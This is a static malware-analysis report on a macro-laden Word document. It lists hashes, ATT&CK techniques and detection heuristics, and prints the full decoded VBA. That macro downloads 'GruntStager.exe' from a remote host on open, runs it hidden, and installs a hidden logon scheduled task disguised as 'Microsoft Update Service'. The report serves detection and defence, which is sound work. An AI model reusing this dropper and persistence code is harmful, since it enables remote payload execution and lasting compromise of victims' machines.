Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e3254193acc6878e…

MALICIOUS

Office (OOXML)

20.9 KB Created: 2021-10-22 06:07:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-10-26
MD5: dcbc96c7b03f3d69d0ee826bf04811f8 SHA-1: c65b9a8081a1eda7a94f3756a85329e78289d804 SHA-256: e3254193acc6878e26d08832d3b343b6f9698df06702aaa171129a58224951d8
358 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro executes a function to download a file named 'GruntStager.exe' from 'the embedded link' to the temporary directory and then executes it. The script also attempts to establish persistence by creating a scheduled task with the description 'Microsoft Update Service'.

Heuristics 9

  • ClamAV: Doc.Downloader.Valyria-10002610-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10002610-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell path, vbHide
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    oStream.Write WinHttpReq.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    path = Environ("TEMP") & "\" & Payload
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.20.107 Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3252 bytes
SHA-256: 7db3c71695ecedd42c9381089a63beacccd029da1cec024e12c3af5230b2aa8a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
    'Define our malicious execution
    Dim Payload As String
    Payload = "GruntStager.exe"
    Dim Server As String
    Server = "http://192.168.20.107"
    Dim path As String
    path = Download(Server, Payload)
    Shell path, vbHide
    Persist (path)
End Sub

Private Function Download(Server As String, Payload As String) As String
    'Download and save the payload, then return its path...
    

Dim path As String
path = Environ("TEMP") & "\" & Payload
Dim url As String
url = Server & "/" & Payload

Dim WinHttpReq
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", url, False
WinHttpReq.Send

If WinHttpReq.Status <> 200 Then
    Exit Function
End If

Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile path, 2
oStream.Close
Download = path
Shell path, vbHide

End Function

Private Function Persist(Payload As String)
    'Create and execute the scheduled task...


'Get the COM Scheduling Service and connect
Set service = CreateObject("Schedule.Service")
service.Connect

'Get the root folder
Dim rootFolder
Set rootFolder = service.GetFolder("\")

'Create a new task definition
Dim taskDefinition
Set taskDefinition = service.newTask(0)

'Perform basic T1036 masquerading
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Microsoft Update Service"
regInfo.Author = "Microsoft Corporation"

'Have the task run as the compromised user
Dim principal
Set principal = taskDefinition.principal
principal.LogonType = 3

'Define a trigger for our service
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(9)
trigger.ID = "LogonTriggerId"
trigger.Enabled = True
trigger.UserId = Environ("USERDOMAIN") & "\" & Environ("USERNAME")
trigger.Delay = "PT1M"  'Delay service execution

'Get settings
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
    
'T1158: Hidden Files and Directories (and now services)
settings.Hidden = True
  
'Prevent our service from timing-out
settings.ExecutionTimeLimit = "PT0S"
settings.AllowHardTerminate = False
  
'Avoid duplicate services
settings.MultipleInstances = 2
  
'Restart our service after 1 minute if we crash
settings.RestartInterval = "PT1M"
  
'Restart our service many, many... many times
settings.RestartCount = 999
  
'Ensure our service runs, regardless of the battery status
settings.StopIfGoingOnBatteries = False
settings.DisallowStartIfOnBatteries = False

'Define our service's action
Dim Action
Set Action = taskDefinition.Actions.Create(0)
Action.path = Payload

'Register our task
Dim task
Set task = rootFolder.RegisterTaskDefinition("Microsoft Update Service", taskDefinition, 6, , , 3)

End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 20480 bytes
SHA-256: 193b2cd32a23d38b500c865fb86a672447cc1c56f93b305c0ef8fc192e265a1c
Detection
ClamAV: Doc.Downloader.Valyria-10002610-0
Obfuscation or payload: unlikely